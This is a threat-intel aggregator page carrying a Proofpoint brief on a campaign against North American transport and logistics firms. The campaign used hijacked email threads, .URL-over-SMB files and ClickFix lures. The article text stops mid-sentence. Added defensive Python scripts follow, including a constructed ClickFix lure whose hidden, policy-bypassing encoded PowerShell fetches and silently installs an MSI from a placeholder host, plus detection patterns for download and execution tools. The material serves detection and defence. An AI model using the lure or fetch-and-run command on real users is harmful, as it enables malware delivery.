One Article Review

Home - The article:
Source ProofPoint
Identifier 8583820
Publication date 2024-09-24 12:09:32 (viewed: 2024-09-24 13:17:14)
Title Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware
Text

What happened

Proofpoint researchers are tracking a cluster of activity targeting transportation and logistics companies in North America to deliver a variety of different malware payloads.

Notably, this activity leverages compromised legitimate email accounts that belong to transportation and shipping companies. At this time, it is unclear how the actor achieves access to the compromised accounts. The actor then injects malicious content into existing conversations within the account's inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns.

Researchers have been tracking this activity cluster since late May 2024. Activity which occurred from May to July 2024 predominantly delivered Lumma Stealer, StealC, or NetSupport. In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2.

Most campaigns use messages with Google Drive URLs leading to an internet shortcut (.URL) file, or a .URL file attached directly to the message. If executed, the shortcut uses SMB to access an executable from the remote share, which installs the malware.

[Figure: Actor responds from a compromised account to a request within an ongoing thread.]

[Figure: Actor using a compromised account to post a malicious link to an ongoing thread.]

Campaigns typically include fewer than 20 messages and impact a small number of customers, all in the same transport/logistics industries in North America.

In August 2024, the actor also began using the "ClickFix" technique to deliver their malware. The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML. The scripts led to an MSI file used to load DanaBot.
[Figure: Initial "ClickFix" dialogue box in which clicking the "Fix it" button copies a Base64 encoded PowerShell script.]

[Figure: Final "ClickFix" dialogue box with instructions to open Windows PowerShell and paste and run the PowerShell script.]

While Proofpoint has observed this technique leveraged by other threat actors impersonating Word or Chrome updates, these campaigns have impersonated Samsara, AMB Logistic, and Astra TMS, software that would only be used in transport and fleet operations management.

Attribution

Proofpoint does not currently attribute this activity cluster to an identified threat actor (TA). Similar techniques and infrastructure associated with ClickFix and the combination of Google Drive URLs, .URL files, and SMB have been observed in use by other threat actors and campaigns. Proofpoint researchers assess that the threat actor discussed in this Security Brief is purchasing this infrastructure from third-party providers.

Based on the observed initial access activity, malware delivery, and infrastructure, Proofpoint assesses with moderate confidence that the activity aligns with financially motivated, cybercriminal objectives.

Why it matters

Threat actors are increasingly tailoring lures to be more realistic to entice recipients to click on a link or download attachments. Compromising legitimate email accounts and sending malicious links and attachments in an existing email conversation achieves this goal and raises the risk that recipients will install malware.

The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicate that the actor likely conducts research into the targeted company's operations before sending campaigns. The language used in the lures and content also indicates familiarity with typical business workflows.

This activity aligns with a trend Pro
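As an added example for the ".URL file, then SMB, then executable" delivery chain described in the brief (this is not Proofpoint's tooling), the routine below parses a Windows Internet Shortcut and flags a target that is fetched from a remote share or that has an executable file type. The sample shortcuts are constructed (TEST-NET address 198.51.100.23, invented file names). It goes slightly beyond the brief in two places, both labelled in the code: it also recognises Windows' `\\host@SSL\` / `\\host@port\` WebDAV form alongside plain SMB, and it checks `IconFile`, which Explorer resolves when it renders the shortcut.

```python
"""Triage a Windows Internet Shortcut (.URL) file for a remote-share executable target.

Added example for the ".URL file -> SMB share -> executable" chain described above;
it is not Proofpoint's tooling. The sample shortcuts are constructed
(TEST-NET address 198.51.100.23, invented file names).
"""
import configparser
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Extensions Windows will execute (or that chain to execution) when the target is opened.
EXEC_EXTS = {".exe", ".msi", ".dll", ".scr", ".hta", ".bat", ".cmd", ".js",
             ".jse", ".vbs", ".vbe", ".wsf", ".ps1", ".lnk", ".cpl"}
# \\host\share\path, optionally \\host@SSL\ or \\host@80\ (Windows' WebDAV redirector syntax;
# the brief itself only reports SMB).
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(ssl|\d+))?\\(.*)$", re.IGNORECASE)
WEBDAV_TAG = re.compile(r"@(?:ssl|\d+)$", re.IGNORECASE)
LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys (lower-cased) of a .URL file; .URL is INI format."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text.lstrip("\ufeff"))  # drop a UTF-8 BOM if present
    if "InternetShortcut" not in cp:
        raise ValueError("not a .URL file: no [InternetShortcut] section")
    return {k.lower(): v for k, v in cp["InternetShortcut"].items()}


def classify_target(target: str) -> dict:
    """Work out where a shortcut target points and whether opening it runs code."""
    target = target.strip()
    host, path, transport = "", "", "other"
    m = UNC_RE.match(target)
    if m:  # bare UNC path
        host, port_tag, rest = m.groups()
        path = "/" + rest.replace("\\", "/")
        transport = "webdav" if port_tag else "smb"
    else:
        parts = urlsplit(target)
        scheme = parts.scheme.lower()
        if scheme == "file":
            host, path = parts.netloc, unquote(parts.path)
            # file:///C:/... has no host and is local; file://host/... is fetched over SMB
            # (or WebDAV when the host carries an @SSL / @port tag).
            if not host:
                transport = "local"
            else:
                transport = "webdav" if WEBDAV_TAG.search(host) else "smb"
        elif scheme in ("http", "https"):
            host, path, transport = parts.netloc, unquote(parts.path), scheme
    ext = posixpath.splitext(path)[1].lower()
    remote_share = transport in ("smb", "webdav") and host.lower() not in LOOPBACK
    return {"transport": transport, "host": host, "path": path, "ext": ext,
            "remote_share": remote_share, "executable": ext in EXEC_EXTS}


def triage_url_file(text: str) -> dict:
    """Flag a .URL file whose target (or icon) is fetched from a remote share."""
    keys = parse_url_file(text)
    target = classify_target(keys.get("url", ""))
    reasons = []
    if target["remote_share"]:
        reasons.append(f"target fetched over {target['transport']} from {target['host']}")
    if target["executable"]:
        reasons.append(f"target is an executable type ({target['ext']})")
    icon = classify_target(keys.get("iconfile", ""))
    if icon["remote_share"]:
        # Explorer resolves IconFile when it renders the shortcut, before any click (beyond the brief).
        reasons.append(f"IconFile fetched over {icon['transport']} from {icon['host']}")
    return {"target": target, "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples (not indicators from the report).
SAMPLE_LURE = """[InternetShortcut]
URL=file://198.51.100.23/share/rate_confirmation.exe
IconIndex=1
IconFile=C:\\Windows\\System32\\SHELL32.dll
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/portal/login
"""

if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        result = triage_url_file(sample)
        print(name, "suspicious" if result["suspicious"] else "clean", result["reasons"])
```

Run it over .URL attachments at the mail gateway and over .URL files fetched from the Google Drive links the brief describes. The chain also depends on the workstation being able to reach the actor's share, so a remote SMB target is worth blocking regardless of what this check says about the file type.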
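As an added example for the ClickFix flow described above (a "Fix it" button that copies a Base64 encoded PowerShell command, which the victim is told to paste into Windows PowerShell), the script below finds the clipboard-copy code and the encoded command in a lure page, decodes the command the way PowerShell's `-EncodedCommand` does (UTF-16LE), and lists the behaviours it exhibits. This is not Proofpoint's code, and the HTML is constructed here: the payload it carries merely launches msiexec against a TEST-NET URL, mirroring the "script leads to an MSI file" step without any real payload.

```python
"""Pull the Base64-encoded PowerShell out of a ClickFix lure page and decode it.

Added example for the ClickFix flow described above (not Proofpoint's code).
The HTML below is constructed: the "Fix it" button copies a PowerShell command
whose encoded payload launches msiexec against a TEST-NET URL.
"""
import base64
import re

# A JavaScript/HTML string that invokes powershell with parameters, up to the closing quote or tag.
CMD_RE = re.compile(r"powershell(?:\.exe)?\s+-[^\"'`\n<]*", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by the Base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)",
                          re.IGNORECASE)
INDICATORS = [
    ("hidden window", r"-w(?:indowstyle)?\s+hidden"),
    ("execution policy bypass", r"-e(?:xecutionpolicy|p)\s+bypass"),
    ("msiexec", r"\bmsiexec\b"),
    ("web download", r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|\bcurl\b|Start-BitsTransfer"),
    ("in-memory execution", r"Invoke-Expression|\biex\b"),
    ("process launch", r"Start-Process|\bsaps\b"),
    ("remote URL", r"https?://\S+"),
]


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand blob: UTF-16LE as PowerShell expects, else fall back to UTF-8."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    # ASCII text in UTF-16LE has a NUL in every odd byte position.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def scan_indicators(text: str) -> list:
    """Names of the INDICATORS patterns that occur in text."""
    return [name for name, pattern in INDICATORS if re.search(pattern, text, re.IGNORECASE)]


def analyze_clickfix_html(html: str) -> dict:
    """Report clipboard-copy code plus every encoded PowerShell command found in the page."""
    commands = []
    for m in CMD_RE.finditer(html):
        cmd = m.group(0)
        enc = ENC_RE.search(cmd)
        decoded = decode_encoded_command(enc.group(1)) if enc else ""
        # Scan the command line with the blob removed (so random Base64 cannot match \biex\b)
        # together with the decoded script.
        visible = ENC_RE.sub("-enc <blob>", cmd)
        commands.append({"command": cmd, "decoded": decoded,
                         "indicators": scan_indicators(visible + "\n" + decoded)})
    clipboard = bool(CLIPBOARD_RE.search(html))
    if clipboard and any(c["indicators"] for c in commands):
        verdict = "clickfix-like"
    elif commands:
        verdict = "encoded powershell found"
    else:
        verdict = "no findings"
    return {"clipboard_copy": clipboard, "commands": commands, "verdict": verdict}


def to_encoded_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed lure: harmless, points at a TEST-NET address.
CONSTRUCTED_SCRIPT = 'Start-Process msiexec.exe -ArgumentList "/i http://203.0.113.10/fix.msi /qn"'
SAMPLE_HTML = f"""<html><body>
<div id="fix"><p>The document could not be displayed.</p>
<button onclick="navigator.clipboard.writeText(cmd)">Fix it</button>
<p>Then open Windows PowerShell, paste (Ctrl+V) and press Enter.</p></div>
<script>
var cmd = "powershell -w hidden -nop -ep bypass -enc {to_encoded_command(CONSTRUCTED_SCRIPT)}";
</script></body></html>"""

if __name__ == "__main__":
    report = analyze_clickfix_html(SAMPLE_HTML)
    print(report["verdict"], "| clipboard copy:", report["clipboard_copy"])
    for c in report["commands"]:
        print("decoded:", c["decoded"])
        print("indicators:", ", ".join(c["indicators"]))
```

The decoder tries UTF-16LE first because that is what `powershell -EncodedCommand` consumes; lures that instead embed a UTF-8 script and decode it themselves fall through to the UTF-8 branch. Real lure pages often split or obfuscate the command string across several JavaScript literals, so treat this as a first pass that works on the straightforward form shown in the brief.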
Rating ★★
Sent Yes
Digest: the page's word index over the full article, truncated. The only recoverable indicators in it are the file hashes below (64 hex characters each; the index also carries a "sha256" token). The index does not say which payload each hash belongs to, and its fragmentary defanged URLs are not reproduced.
0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2
163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a
199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431
1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3
2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319
37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235
582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04
8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618
957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d
ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013
d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d
e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37
e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842
f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f
fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7
Tags Malware Threat Prediction


The article does not appear to have been picked up after its publication.


The article does not appear to have been taken from a previous one.